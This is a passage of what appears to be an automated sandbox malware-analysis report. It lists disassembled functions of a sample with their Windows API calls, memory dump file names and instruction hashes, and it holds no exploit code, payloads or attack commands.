                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4821C1B1804B966EDB65DF75C89477BBEF9BB08301F04091EE099C7A42D334EA41CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E24C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,005E1434,?,00000000), ref: 005E2569
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,005E1434,?,00000000), ref: 005E2589
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,005E1434,?,00000000), ref: 005E25DF
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,FAB1B776,?,00000000,00623C40,000000FF,00000008,?,?,?,?,005E1434,?,00000000), ref: 005E2633
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,FAB1B776,?,00000000,00623C40,000000FF,00000008,?,?,?,?,005E1434), ref: 005E2647
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1291444452-0
                                                                                                                                                                                                                              • Opcode ID: 63961b76d8cd89fa73b524b595f8516e1817f63bc5188e6327437c43504fe530
                                                                                                                                                                                                                              • Instruction ID: 88e341f18bc45ba273dec76f92ba98b8044cadad29cd0f5b420e370fa48a9be3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63961b76d8cd89fa73b524b595f8516e1817f63bc5188e6327437c43504fe530
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 794149726043519BC3289F29DD94A6ABFDDFB48360F10072AF5A6CB2D4EB70D8448794
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EA910 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LocalFree.KERNEL32(005E9C9B), ref: 005EACD1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLocal
                                                                                                                                                                                                                              • String ID: @Tc$@Tc$Tc
                                                                                                                                                                                                                              • API String ID: 2826327444-3541707890
                                                                                                                                                                                                                              • Opcode ID: 1f881718ba0463cb61f19f3bd21b1b2746f5f063a25d73b29d21f317527c8fc8
                                                                                                                                                                                                                              • Instruction ID: 24700bd3ea62709372d39f03ed732d7487722d733bde78f15864909e646907d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f881718ba0463cb61f19f3bd21b1b2746f5f063a25d73b29d21f317527c8fc8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCE17E71A00289DFDF18CFA9C884AEEBFF9FF48300F154159E855AB251D770A945CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00621D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(FAB1B776,?,00000000,?), ref: 00621DFE
                                                                                                                                                                                                                                • Part of subcall function 0061A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00616F5E,?,00000000,-00000008), ref: 0061AA67
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00622059
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006220A1
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00622144
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                              • Opcode ID: e5b252380d31f08e5a7e83e5e0c69fef002ed306ed9d03e2cd7fc583b6fa06d9
                                                                                                                                                                                                                              • Instruction ID: efd6773d150df821ef0ad5430a5849188d6d8c41ffe7776615cbd485858fe2b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b252380d31f08e5a7e83e5e0c69fef002ed306ed9d03e2cd7fc583b6fa06d9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CD1ABB1D00659AFCB15CFA8E890AEDBBB6FF09314F18452AE915EB351D730A941CF60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00600116 Relevance: 6.3, APIs: 4, Instructions: 287COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0060011D
                                                                                                                                                                                                                              • collate.LIBCPMT ref: 00600126
                                                                                                                                                                                                                                • Part of subcall function 005FEDF2: __EH_prolog3_GS.LIBCMT ref: 005FEDF9
                                                                                                                                                                                                                                • Part of subcall function 005FEDF2: __Getcoll.LIBCPMT ref: 005FEE5D
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 0060016C
                                                                                                                                                                                                                              • numpunct.LIBCPMT ref: 006003C4
                                                                                                                                                                                                                                • Part of subcall function 005E6330: LocalAlloc.KERNEL32(00000040,?,005F0E04,00000020,?,?,005E9942,00000000,FAB1B776,?,?,?,?,006250DD,000000FF), ref: 005E6336
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 259100098-0
                                                                                                                                                                                                                              • Opcode ID: 5dfb8d4ed5ea941bca704a4eed9ca1c241fd46c73d9b2a6708d0f51a275c6286
                                                                                                                                                                                                                              • Instruction ID: eb3c517576e1c1c9d4cebbfffa9bb0c2c0e384db5ed1235ade397e6b0cf69417
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dfb8d4ed5ea941bca704a4eed9ca1c241fd46c73d9b2a6708d0f51a275c6286
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1091C871D012566AE7187FB54C0AB7F7EA6FF85360F104869F94DA72C1EE744D0087A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006124E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c688ed3e98e070a0b1059cb4d0e45bf24665fb0016eebc48367a06b750fd5ca9
                                                                                                                                                                                                                              • Instruction ID: be0ebb21ead7f50f7228e909bdd2cff69e6af34a78470846f0de5e528c0a3099
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c688ed3e98e070a0b1059cb4d0e45bf24665fb0016eebc48367a06b750fd5ca9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B721BE71604206AFDB28AF71DCB2DEB77ABAF443647088519F815872A0D730ECA197A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ECCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,FAB1B776), ref: 005ECD1C
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 005ECD3C
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 005ECD6D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 005ECD86
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3604237281-0
                                                                                                                                                                                                                              • Opcode ID: f4a3398e6d3ae6071ccfa1c2be64c265087a8558f1ccc96bf610b5d0d4a34cad
                                                                                                                                                                                                                              • Instruction ID: ea6d9101d940b3f9ecb46ba33f7e9b675b115df3ae1408e489cff39058e18f61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4a3398e6d3ae6071ccfa1c2be64c265087a8558f1ccc96bf610b5d0d4a34cad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4121B1B0941758EBD7308F54DD0AFAABFB8FB05B24F104229F511A72D0DBB06A058BE4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00623686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00623053,?,00000001,?,?,?,00622198,?,?,00000000), ref: 0062369D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00623053,?,00000001,?,?,?,00622198,?,?,00000000,?,?,?,0062271F,?), ref: 006236A9
                                                                                                                                                                                                                                • Part of subcall function 0062366F: CloseHandle.KERNEL32(FFFFFFFE,006236B9,?,00623053,?,00000001,?,?,?,00622198,?,?,00000000,?,?), ref: 0062367F
                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 006236B9
                                                                                                                                                                                                                                • Part of subcall function 00623631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00623660,00623040,?,?,00622198,?,?,00000000,?), ref: 00623644
                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00623053,?,00000001,?,?,?,00622198,?,?,00000000,?), ref: 006236CE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                              • Opcode ID: 1ac26545c53ba2de43a62bc96e5caf86d8ff1f4141657068cb5fc80ed4f78fd0
                                                                                                                                                                                                                              • Instruction ID: 568166aa3cf587f39b7aaadbd942cc02681a3bd0b80b5bd127e566a599ecd685
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ac26545c53ba2de43a62bc96e5caf86d8ff1f4141657068cb5fc80ed4f78fd0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF01C36504538BBCF622F95EC09D893F6BFB087B1B044050FE1996320CB328920EF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00611A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00611AFD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                              • Opcode ID: 5d7e10a8b59098f21aa9c31ec63f45a46f5d610f960f7713c5e9ddea38023d9d
                                                                                                                                                                                                                              • Instruction ID: b2a9f36af62d5b452bf194a1655f02840e3b6bc2cee31db4d2703fdfb5923480
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d7e10a8b59098f21aa9c31ec63f45a46f5d610f960f7713c5e9ddea38023d9d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14517F71A0E501C6CB117B94D9013FE7BA3EB41711F2C8958E1D1C93E9FA368CD69A87
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ED41C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 3382595777-1377069549
                                                                                                                                                                                                                              • Opcode ID: b4551aa2f24091de595f48d3110f37378b954e9faf31f63d63dad03e71314011
                                                                                                                                                                                                                              • Instruction ID: 5a3237e6910abeaff1b6274a1433574d6e6940487446163cf4c8edef8cbb3d3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4551aa2f24091de595f48d3110f37378b954e9faf31f63d63dad03e71314011
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2271BB34D042989FDF19DFA5D4506ECBFB2BF59314F28409AE8817B382DB30A946CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F15FB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 3382595777-1377069549
                                                                                                                                                                                                                              • Opcode ID: aea86ed574532912e2d6e01445da9c03e7db67f485d517edf55968b08e746491
                                                                                                                                                                                                                              • Instruction ID: b49dc544517c15fcb887b5780c60b087f626b3b63229adc2c5a998f204d54a34
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aea86ed574532912e2d6e01445da9c03e7db67f485d517edf55968b08e746491
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26719B34D05A5CDBCF14DFA4C4906FDBFB2BF49310F284099E9856B296CB385942CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F180A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 3382595777-1377069549
                                                                                                                                                                                                                              • Opcode ID: 47d49f9f1217019796157c9ad548d925d22a5b1fb1545a3a540f353d4ffe78ce
                                                                                                                                                                                                                              • Instruction ID: c4b863ad8d34a3ad60740121a77c0df87267685fb8ddabf17925d8f17334b772
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47d49f9f1217019796157c9ad548d925d22a5b1fb1545a3a540f353d4ffe78ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1718B34900A2DDBCF18DF94C5506FDBFB2BF58350F544059E9827B285DB785942CB98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F1A26 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 3382595777-1377069549
                                                                                                                                                                                                                              • Opcode ID: a5120d403bcecb661855f93dae1aec27424f691e8955bd1abda0d3a0ff391a50
                                                                                                                                                                                                                              • Instruction ID: eca470823751fd3b3a2d0ab2c38857ac86d7b9023e3c75f1bb2ef7642c6dd0f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5120d403bcecb661855f93dae1aec27424f691e8955bd1abda0d3a0ff391a50
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A71AC34905A6DDBCF18DF94C490AFDBFB2BF58310F144049E98267285EB385D82CB98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00601E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                                                                              • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                              • API String ID: 3732870572-1956417402
                                                                                                                                                                                                                              • Opcode ID: e44170f08fb8a29d2363e797dfe2618e71e92aff5b7d3f61c7a4e3aa6a53edda
                                                                                                                                                                                                                              • Instruction ID: 76b529116a3d8cde34014e6e4d6483a896c3342af97bfac1cfabe169c7d0eaf6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e44170f08fb8a29d2363e797dfe2618e71e92aff5b7d3f61c7a4e3aa6a53edda
